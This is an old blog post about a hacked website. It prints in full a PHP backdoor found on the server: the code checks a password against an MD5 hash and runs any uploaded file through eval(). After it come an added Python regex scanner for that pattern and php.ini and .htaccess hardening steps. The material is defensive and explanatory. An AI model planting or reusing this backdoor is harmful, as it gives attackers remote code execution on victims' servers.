Monday, January 11, 2010

.htaccess was hacked

SkyHi @ Monday, January 11, 2010

<?php
error_reporting(1);
global $HTTP_SERVER_VARS;

function say($t) {
echo "$t\n";
};

function testdata($t) {
say(md5("testdata_$t"));
};

echo "
"; 

testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
eval($code); }
else{ testdata('f');
};
}else{
testdata('pass');
};
testdata('end');

echo "
";

?>
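A defender-side check for the pattern in the file above, added here as an example and not part of the original post or the forum thread: a small Python scanner that flags PHP source combining `eval()` with an uploaded-file read or a hard-coded MD5 password gate. The rule names, `scan_php`, `verdict` and the benign upload sample are this example's own; the backdoor sample reuses lines from the file above.

```python
import re

# Heuristics drawn from the backdoor shown above (rule names are this example's own).
RULES = {
    "eval-call": re.compile(r"\beval\s*\(", re.I),
    "upload-read": re.compile(r"\$(?:HTTP_POST_FILES|_FILES)\s*\[[^\]]+\]\s*\[\s*[\"']tmp_name[\"']\s*\]", re.I),
    "md5-gate": re.compile(r"md5\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b[^)]*\)\s*={2,3}\s*[\"'][0-9a-f]{32}[\"']", re.I),
    "silenced-io": re.compile(r"@\s*(?:fopen|fread|file_get_contents|include|require)\s*\(", re.I),
}

# Lines taken from the file shown above.
SAMPLE_BACKDOOR = r'''<?php
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
eval($code); }
}
'''

# Constructed benign upload handler: touches tmp_name but never evaluates it.
SAMPLE_UPLOAD = r'''<?php
if (is_uploaded_file($_FILES["f"]["tmp_name"])) {
    move_uploaded_file($_FILES["f"]["tmp_name"], "/srv/uploads/" . basename($_FILES["f"]["name"]));
}
'''

def scan_php(source):
    """Return {rule_name: [line numbers]} for every rule that matches."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def verdict(hits):
    """Combine rule hits: eval plus an upload read or password gate is the backdoor shape."""
    if "eval-call" in hits and (hits.keys() & {"upload-read", "md5-gate"}):
        return "backdoor-like"
    if "eval-call" in hits or "md5-gate" in hits:
        return "review"
    return "clean"

if __name__ == "__main__":
    for label, src in (("backdoor", SAMPLE_BACKDOOR), ("upload", SAMPLE_UPLOAD)):
        hits = scan_php(src)
        print(label, verdict(hits), hits)
```

These are line-based regex heuristics; obfuscated or multi-line variants need a real PHP tokenizer, so read "clean" as "no match", not as proof.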



Solution:
I also decided to go ahead and add the following settings to php.ini to prevent the hackers from getting any additional information:

allow_url_fopen = Off
register_globals = Off
display_errors = Off
expose_php = Off
log_errors = On

Also make sure that you add this to your .htaccess file so people can't see your php.ini settings:


<Files php.ini>
order allow,deny
deny from all
</Files>


Reference : http://forums.devshed.com/apache-development-15/htaccess-was-hacked-can-you-help-me-with-what-they-512348-2.html